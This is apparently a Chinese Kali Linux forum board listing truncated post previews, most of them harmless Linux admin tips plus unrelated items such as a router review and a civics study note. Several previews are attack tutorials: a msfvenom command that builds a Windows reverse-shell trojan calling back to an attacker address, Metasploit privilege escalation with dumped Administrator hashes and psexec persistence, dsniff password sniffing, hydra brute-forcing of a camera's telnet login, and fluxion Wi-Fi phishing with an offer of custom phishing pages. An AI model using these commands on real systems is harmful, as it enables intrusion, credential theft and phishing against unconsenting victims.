Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
404个主题在此版块
-
- 0 篇回复
- 132 次查看
dsniffdsniff 是一个密码侦测工具,他能够自动分析端口上收到的某些协议的数据包,并获取相应的密码。 dnisff 支持的协议有 FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL。 dsniff 使用dsniff [-c] [-d] [-m] [-n] [expression] 注意:这里所有的 expression 都是代表 TCPDUMP 的表达式,指定对哪些数 据包进行攻击 urlsnarfurlsnarf可以嗅探 HTTP 请求报文的内容,并以 CLF (Common Log Format)通用日志格式 输出 使用 urlsnarf[-n] [-i interface] [[-v] pattern[expression]] webspywebspy 指定一个要嗅探的主机,如果指定主机发送 HTTP 请求,打开网页,webspy 也会通 过 netscape 浏览…
Ken1Ve的最后回复, -
- 0 篇回复
- 119 次查看
前言平时自己比较赖,论坛和博客平时都需要维护。比如数据库备份,那么在平时的工作中怎么高效的完成数据库备份任务呢? 废话不在多说,上源码。 源码#! /bin/ sj=`date +%Y%m%d%H%M%S` read -p "要备份的数据库名:" sql mysqldump -u root -p $sql >/root/bf/数据库$sql备份`date +%Y%m%d%H%M%S`.sql echo "备份时间:$sj" >> /root/bf/log.txt。 echo "恭喜!数据库以备份"使用说明先在root目录下新建个bf文件夹将文件保存为sql.sh给脚本给与权限chmod -R 777 sql.sh终端命令./sql.sh输入要备份的数据库名称即可开始备份log.txt用来记录备份的日志。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/256.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 133 次查看
linux删除文件夹命令 在用Linux的时分,有时分要删除一个文件夹,常常会提示次此文件非空,没法删除,这个时候,必需运用rm -rf命令。关于一些小白用户常常在运用Linux命令,会十分当心,以免搞出一些事情,下面小编将教细致教大家如何运用linux命令删除文件夹,需求的请珍藏。 linux删除文件夹命令 linux删除文件夹命令实例: rm -rf /var/log/httpd/access将会删除/var/log/httpd/access目录以及其下所有文件、文件夹 linux删除文件夹命令 linux删除文件命令实例: rm -f /var/log/httpd/access.log将会强制删除/var/log/httpd/access.log这个文件 -r 是向下递归,不管有多少级目录,一并删除 -f 是直接强行删除,不作任何提示的意思 -i 进行交互式删除。 提示:运用rm命令要当心。由于一旦文件被删除,它是不能被恢复的。了避免这种状况的发作,能够运用i选项来逐一确认要删除的文件。假如用户输入y,文件将被删除。假如输入任何其他东西,文件则不会删除。 运用这个rm -rf删除文件的时分一定要格外当心,linux没有回收站的。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/260.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
前不久刚入手魅族路由器一台,今天让我们从其外观,功能等方面进行一次简单的测评。说说快递,顺丰快递。下单后两天就到货,很快! 恩,开箱(双手已饥渴难耐) 包装还可以…… 爆爆菊花 支持USB接口,两个wlan口,支持充电宝供电(适合没电的时候用) 插入网线,进行配置 配置过程可以在浏览器中输入192.168.232.1或者下载APP直接配置。 APP首页 插件列表 里面插件比较多,我就不再一一的说明 了。这里给大家演示下迅雷下载加速插件。 在正常情况下,(没有迅雷会员)下载速度 基本在2M左右,这个只是一个简单的测评,没有那么专业。只是和平时的下载速度相比较。 在接口处 插入U盘或者移动硬盘,我们可以查看U盘中的文件。当然也可以将远程文件下载到我们的U盘中。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/261.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 107 次查看
代码<!--富强--> <script type="text/javascript"> /* 鼠标特效 */ var a_idx = 0; jQuery(document).ready(function($) { $("body").click(function(e) { var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善"); var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length; var x = e.pageX, y = e.pageY; $i.css({ "z-index": 999, "top": y - 20, "left": x, "position": "absolute", "font-weight": "bold", "color": "#ff6651" }); $("body").append($i); $i.animate({ …
Ken1Ve的最后回复, -
第一课 青春的邀约1. 青春期身体变化的主要表现:身体外形的变化,内部器官的完善,性机能的成熟。 2.青春期身体发育情况各不相同的原因及应有的态度 原因:受遗传、营养、锻炼等因素的影响,我们身体的发育情况各不相同。 态度:①我们要正视身体的变化,欣然接受青春花蕾的绽放。②不因自己的生理变化而自卑,是我们对自己的尊重;不嘲弄同伴的生理变化,是我们对同伴的尊重。 调节青春期的矛盾心理的方法: ①参加集体活动,在集体的温暖中放松自己。②通过求助他人,学习化解烦恼的方法。③培养兴趣爱好转移注意力,接纳和调适青春期的矛盾心理。④学习自我调节,成为自己的“心理保健医生” 。 4. 自我调节的方法:①把自己的想法写下来;②参加体育活动;③学习自我暗示;④试试自我解嘲。 5.怎样正确认识思维的独立性 ( 思维的独立要求我们如何做 )? 思维的独立并不等同于一味追求独特,而是意味着不人云亦云,有自己独到的见解,同时接纳他人合理、正确的意见。 6.培养批判精神的作用 ( 意义 ) 和方法 作用 ( 意义 ) :①有助于我们发现问题、提出问题,并从不同角度去思考问题,探索解决方案; ②能调动我们的经验,激发我们新的学习动机,促使我们解决问题,改进现状。 方法:①要有质疑的勇气,有表达自己观点、提出合理化建议的能力; ②要考虑他人的感受,知道怎样的批判更容易被人接受,更有利于解决问题。 7.开发创造潜力的方法: ①青春韶华,我们要争当勤奋学习、自觉劳动、勇于创造的好少年,这是时代的要求。②敢于打破常规,追求生活的新奇与浪漫,开创前人未走之路;关注他人与社会…
Ken1Ve的最后回复, -
- 0 篇回复
- 124 次查看
解决方法1、/usr/sbin/sestatus -v ##如果SELinux status参数为enabled即为开启状态 SELinux status: enabled 2、getenforce ##也可以用这个命令检查 关闭SELinux: 3、临时关闭(不用重启机器): setenforce 0 ##设置SELinux 成为permissive模式 4、临时开启(不用重启机器): setenforce 1 ##设置SELinux 成为enforcing模式 5、修改配置文件需要重启机器: 修改/etc/selinux/config 文件 将SELINUX=enforcing改为SELINUX=disabled 重启机器即可 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/275.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 137 次查看
1.0 更改系统 apt 源Ubuntu 的软件源配置文件是 /etc/apt/sources.list 文件中。 可以将其更改为国内的软件源,例如: 清华大学开源软件镜像站 中科大开源软件镜像站 1.1 备份 sources.list 并更改:备份原来的源cp /etc/apt/sources.list /etc/apt/sources.list.back编辑源。删除打开的文件中所有行,替换为上述网站中获取到源 vi /etc/apt/sources.list(不会用 vi 的自行搜索) 1.2 更新软件列表 和 软件包#更新软件列表 sudo apt update #更新软件包 sudo apt upgrade2.0 创建 python 环境2.1 安装pip、虚虚拟环境、方便管理虚拟环境的插件 为 python 安装pip pip install python-pip安装虚拟环境 virtualenv pip install virtualenv便于管理虚拟环境的一个插件 pip install virtualenvwrapper多说一句 Windows 下的 virtualenvwrapper 为 virtualenvwrapper-win 2.2 为插件创建环境变量。二选一即可编辑当前用户的环境变量:vi ~/. rc 编辑系统环境变量:sudo vi /etc/profile 打开环境变量文件后,在底部增加如下行: export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HO…
Ken1Ve的最后回复, -
- 0 篇回复
- 125 次查看
Synergy是一款跨平台的键盘鼠标共享软件,现在有Synergy 和Synergy 64位的Win版本、Synergy Mac版,Synergy 能够让使用者仅用一套键盘鼠标,就同时操控多部计算机的免费工具软件。使用者能够在包括 Windows 、 Linux 、 Mac OS 等不同的系统上安装它,并且在设定好主从关系后,就能够透过一组键盘鼠标来进行多部计算机的操控。 注意事项电脑需要在同一个局域网之下每一台电脑都要安装Synergy软件鼠标和键盘所在的电脑设置为 Service 端,其余设置为 client 端 WIN下设置1、选中server(就是服务器,共享鼠标和键盘) 2、configure interactively-configure server,加上要连接的电脑(mac,名字可以从mac的共享里看到),本机(也就是xp)已经自动加进去了,如果没加就自己手工加上,电脑名字是在(我的电脑-右键-属性-计算机名-完整的计算机名称),然后调整电脑的摆放位置即可,一共有15个格子,能加15台电脑,当监视器也差不多了 3、双击电脑图表,可以设置dead corners(死角,不会让鼠标乱飞,如:服务器右边没电脑的,就把鼠标的死角设置为top-right右上&bottom-right右下) 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/280.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 115 次查看
这几天论坛里面的小伙伴发了些linux下的一些命令,这里我做简单的归纳!在linux显示日历所用命令cal 使用: 显示2018年的日历 cal -y 2018 在linux显示天气预报所用命令wttr.in wttr.in是一个在线网站,根据ip地位将本地的天气预报已字符串的形式显示。 命令: curl wttr.inv 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/282.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 124 次查看
源码<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>bbs统计系统</title> <!--数据库--> <?php $servername = "localhost"; $username = "root"; $password = "123456"; $dbname = "tj"; // 创建连接 $conn = mysqli_connect($servername, $username, $password, $dbname); // Check connection if (!$conn) { die("连接失败: " . mysqli_connect_error()); } $sql = "SELECT * FROM sj"; $result = mysqli_query($conn, $sql); $result = mysqli_query($conn, $sql); if…
Ken1Ve的最后回复, -
- 0 篇回复
- 125 次查看
由于自学python3,需要在服务器上调试python程序。在centos中,自带有python2,因此需要经常安装python3。但是这里有一个坑,就是centos的yum是用python2写的,如果正常编译安装python3,那么yum就会直接挂了。为了方便以后编译安装python3,不用天天去网上找教程,准备写下这篇文章,供日后参考。首先连上服务器,看下python版本:python -V如图我们可以看到centos下,默认带有python2.7.5: 接下来我们开始安装python3。1 安装python3所需要的组件 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel 2 备份现有的python2 cd /usr/bin mv python python.bak mv pip pip.bak3 下载并编译安装python3这篇文章我们选择最新的稳定版本3.6.5,如有更新可以自行去官网(https://www.python.org/downloads/source/)查找下载地址。 cd ~ && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz tar -xvJf Python-3.6.5.tar.xz cd Python-3.6.5 指定安装路径 ./configure pr…
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
介绍NIKTO:perl语言开发的开源WEB安全扫描器;识别网站软件版本;搜索存在安全隐患的文件;检查服务器配置漏洞;检查WEB Application层面的安全隐患;避免404误判依据响应文件内容判断,不同扩展名的文件404响应内容不同。命令列表root@kali:~#nikto -h Option host requires an argument -config+ Use this config file -Display+ Turn on/off display outputs -dbcheck check database and other key files for syntax errors -Format+ save file (-o) format -Help Extended help information -host+ target host -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -output+ Write …
Ken1Ve的最后回复, -
文件找不到了,Windows上,大家习惯了右上角直接搜索,分分钟就找回来了,但这样操作真的安全吗? 反正,这样的“便宜”事就别想对Linux做了。 其实,Linux上的文件查找也并不难啦,而且安全性十足哒(特别花样多,比格高),就小小的find的就能做到。find的用法(绝对core)基本格式:find 搜索范围 搜索条件 搜索内容 白话解:就是find空格后面加你想要搜索的目录(/xxx),再空格后面加上搜索条件(下面吾慢慢讲到),再空格内容就OK啦。 例: find /tmp -name linux.list (查询tmp目录下linux.list文件) 按用户创建来查找例:查询lamp用户在tmp目录下创建的文件。 find /tmp -user lamp按文件大小例:查询tmp目录下大于100MB的文件或小于10MB的文件 find /tmp -size +204800 或find /tmp -size -20480科普:size是代码块,一个数据块 = 512字节=0.5k 1k=1024字节 1m=1024k 区间查找:把两个例子组合起来,find /tmp -size +20480 && -size -204800按时间查找查询10分钟之前访问的文件find /tmp -amin -10(注:a:access的简写 min:minute)查询10分钟之内修改的文件 find /tmp -mmin -10(注:m:modify的简写 min:minute)查询10分钟之内属性被修改的文件 find …
Ken1Ve的最后回复, -
- 0 篇回复
- 138 次查看
获取管理员hash获得shell后,执行命令 getsystem提高权限为管理员权限,接着执行命令 run post/windows/gather/hashdump获取hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e::: 权限维持执行命令 use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 443 set RHOST 192.168.232.204 set SMBUser Administrator show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.232.204 yes The target address RPORT 445 yes The SMB service …
Ken1Ve的最后回复, -
- 0 篇回复
- 137 次查看
前言发现一款摄像头,抱着好奇的心态,开始了漫长的渗透之路。 扫描目标及端口扫描目标: nmap -P0 192.168.6.1/24发现设备192.168.6.102为新设备,我们对此ip进行端口扫描 端口扫描: nmap -T4 -A 192.168.6.102 效果如下: 我们可以看到,当前开启的端口有21 23 80 30000等端口。 访问80端口 提示安装插件,嗯……懒得安装,接着来 既然开启了21和23端口,这说明存在ftp和telnet服务,我们尝试弱口令登录。 然而,并没有卵用。 尝试暴力破解新建一个my.txt字典,尝试暴力破解 hydra 192.168.6.102 telnet -l admin -P /root/my.txt -V 恩,还是没结果,别放弃,接着来! 在扫描端口的时候,发现存在30000端口,恩,这是什么鬼,看看! 浏览器访问30000端口 出现一串神秘的字符,等等,这串字符是不是设备的ID呢?带着这个设想,我下载了他们产品的APP 如图,输入设备id,账号和密码默认! 点击保存,激动人心的提示保存成功。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/314.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 131 次查看
软件介绍fluxon是kali下的一款wifi钓鱼工具。通过钓鱼的方式获得对方WiFi密码。 视频演示 备注需要其他页面的,可以私聊管理员!也可以定做各种页面。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/312.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 150 次查看
文件读取代码如下: package priess; import java.io.BufferedReader; import java.io.File; import java.io.FileReader; public class Mytxt { public static String txt2String(File file){ StringBuilder result = new StringBuilder(); try{ BufferedReader br = new BufferedReader(new FileReader(file));//构造一个BufferedReader类来读取文件 String s = null; while((s = br.readLine())!=null){//使用readLine方法,一次读一行 result.append(System.lineSeparator()+s); } br.close(); }catch(Exception e){ e.printStackTrace(); } return result.toString(); } public static void main…
Ken1Ve的最后回复,